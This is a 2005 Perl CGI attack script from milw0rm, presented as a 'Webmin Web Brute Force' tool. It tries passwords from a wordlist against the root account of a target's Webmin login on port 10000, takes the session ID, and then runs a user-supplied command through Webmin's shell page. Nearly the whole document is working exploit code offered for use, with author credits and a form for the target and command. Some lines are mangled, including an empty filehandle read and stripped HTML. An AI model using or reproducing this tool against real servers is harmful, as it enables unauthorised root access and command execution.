Webmin Web Brute Force v1.5

#!/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~Webmin Web Brute Force v1.5 - cgi versiyon Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - DiAblo_2@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist\r\n"; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/\n". "Cookie: testing=1\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: __\n". "\n". $pass_line."\n\n"; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution\n"; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"cmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pwd\"\n". "\n". "/root\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"history\"\n". "\n". "\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"previous\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pcmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604--\n\n"; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/shell/\n". "Cookie: sid=$sid\; testing=1; x\n". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n". "Content-Length: siz\n". "\n". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/

>/g){
           $cmd_chk=1;
        }
        if ($cmd_chk==1) {
           if ($answer=~/<\/pre><\/td><\/tr>/g){
              exit;
           } else {
              print $answer;
           }
        }
  }
}
}

if($atak eq ""){
print qq~

Webmin Web Brute Force v1.5 - cgi
version
Server: 
Wordlist: Examples:
---------
admin
administrator
redhat
mandrake
suse

Cmd: 

~;
}

# milw0rm.com [2005-01-08]

Webmin Web Brute Force v1.5 - cgi version
Server:
Wordlist:		Examples: --------- admin administrator redhat mandrake suse
Cmd: